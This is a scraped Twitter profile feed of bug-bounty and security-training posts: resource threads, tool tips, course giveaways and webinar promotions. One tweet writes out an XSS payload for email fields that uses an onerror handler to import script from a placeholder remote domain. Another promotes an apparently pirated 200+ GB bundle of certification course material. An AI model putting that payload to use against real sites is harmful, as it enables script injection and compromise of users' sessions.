Gajendra upadhyay (@almighty_one007) 's Twitter Profile
Gajendra upadhyay

@almighty_one007

Cybersecurity Researcher, Bug Bounty hunter,Blockchain Enthusiast

ID: 718509586576121856

calendar_today08-04-2016 18:43:29

760 Tweet

37 Takipçi

363 Takip Edilen

Nithin 🦹‍♂️ (@thebinarybot) 's Twitter Profile Photo

Cloud security is one of the hottest topics to learn in 2024 to make $$$$. Explore GCP security through extensive guides, tutorials, and interactive training resources for comprehensive learning🧑‍💻

Cloud security is one of the hottest topics to learn in 2024 to make $$$$.

Explore GCP security through extensive guides, tutorials, and interactive training resources for comprehensive learning🧑‍💻
Nithin 🦹‍♂️ (@thebinarybot) 's Twitter Profile Photo

Every Beginner Bug Bounty Hunter must check this. One of the most easiest bugs you can find as a beginner and make $$$ in 2024 🧵👇

Nithin 🦹‍♂️ (@thebinarybot) 's Twitter Profile Photo

Want to learn more about Mobile App Pentest / Bug Hunting ? Here is a list of high-quality resources 👇 ( PS: The list includes both Android and iOS hacking )

EDDIE CHENG (@ecomeddie) 's Twitter Profile Photo

I’m 33. When I was young, I wasted years drinking, smoking, and being a degenerate. Then I discovered Naval Ravikant and he changed my life forever. Here are 20 teachings from the wisest person of this century (that will change your life too):

I’m 33. 

When I was young, I wasted years drinking, smoking, and being a degenerate.

Then I discovered Naval Ravikant and he changed my life forever.

Here are 20 teachings from the wisest person of this century (that will change your life too):
Nithin 🦹‍♂️ (@thebinarybot) 's Twitter Profile Photo

🕵️ Finding hidden parameters which are left unnoticed by most of hunters, will definitely help you to get more bugs. One such tool used to find hidden parameters is ARJUN. Checkout this 10 Arjun techniques which every bug bounty hunter should know 👇

🕵️ Finding hidden parameters which are left unnoticed by most of hunters, will definitely help you to get more bugs. One such tool used to find hidden parameters is ARJUN. 

Checkout this 10 Arjun techniques which every bug bounty hunter should know 👇
zseano (@zseano) 's Twitter Profile Photo

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@yourdomain .com cc Brute Logic - brutelogic.com.br/blog/xss-limit…

Jason Haddix (@jhaddix) 's Twitter Profile Photo

My talk is coming up for NahamCon! Ben Sadeghipour Here is the work-in-progress XSS mutation bot: chatgpt.com/g/g-1cW3hzJ3C-… and the work-in-progress Acquisitions Bot: chatgpt.com/g/g-3GwxLih5t-… and the work-in-progress Reporting Bot: chatgpt.com/g/g-7BYOKw9eo-… and my epic general web

Md Riyazuddin (@riyazmd774) 's Twitter Profile Photo

Everything you can do legally (or almost) with Flipper Zero. The Ultimate Tamagotchi for Hackers... [ 🔖 Save this for later ]

Everything you can do legally (or almost) with Flipper Zero.

The Ultimate Tamagotchi for Hackers...

[ 🔖 Save this for later ]
Jason Haddix (@jhaddix) 's Twitter Profile Photo

Arcanum Information Security On June 23rd i'll be giving my "Credential Operations" / "Operationalizing Cybercrime Data for Red Teamers and Offsec" training FREE! it's gonna be 🔥🔥🔥 Register here 👇 flare.registration.goldcast.io/webinar/1e64a5…

<a href="/arcanuminfosec/">Arcanum Information Security</a> On June 23rd i'll be giving my "Credential Operations" / "Operationalizing Cybercrime Data for Red Teamers and Offsec" training FREE! it's gonna be 🔥🔥🔥

Register here 👇 

flare.registration.goldcast.io/webinar/1e64a5…
chux (@chux13786509) 's Twitter Profile Photo

Just tried FOFA AI on a fresh target, and the results blew me away! 🚀 It enriched domains, certs, ASNs, and names, then generated a detailed graph of the target's attack surface in minutes. Hands down, better than many recon automation tools I've used for building a map of the

Just tried FOFA AI on a fresh target, and the results blew me away! 🚀
It enriched domains, certs, ASNs, and names, then generated a detailed graph of the target's attack surface in minutes.
Hands down, better than many recon automation tools I've used for building a map of the
X (@themsterdoctor1) 's Twitter Profile Photo

🧠💣 381 FILES. 200+ GB. ELITE ONLY. I just unlocked a vault that would make even top bug bounty hunters drop everything: 🔥 OSCP 🔥 OSEP 🔥 OSWE 🔥 THM / HTB 🔥 EC-Council 🔥 Cisco CyberOps 🔥 Linux Priv Esc 🔥 PEN-300 Full Video Series 🔥 BloodHound, AD, SSH, API, SQL, 🔥

🧠💣  381 FILES. 200+ GB. ELITE ONLY.

I just unlocked a vault that would make even top bug bounty hunters drop everything:

🔥 OSCP
🔥 OSEP
🔥 OSWE
🔥 THM / HTB
🔥 EC-Council
🔥 Cisco CyberOps
🔥 Linux Priv Esc
🔥 PEN-300 Full Video Series
🔥 BloodHound, AD, SSH, API, SQL, 🔥
HackerRats - Uncle Rat ❤️ (XSS Rat) (@thexssrat) 's Twitter Profile Photo

Giveaway thiiiemmmmeeeee RATS LISTEN UP I will do this for you , but PLEASE get me to 150 k 1000's OF FREE COURSES!!! PLEASE SHARE AND SHOW THE WORLD THAT THE RAT IS STRONG!! CAPIE ========== udemy.com/course/capie-c… udemy.com/course/capie-c… CNWPP ==========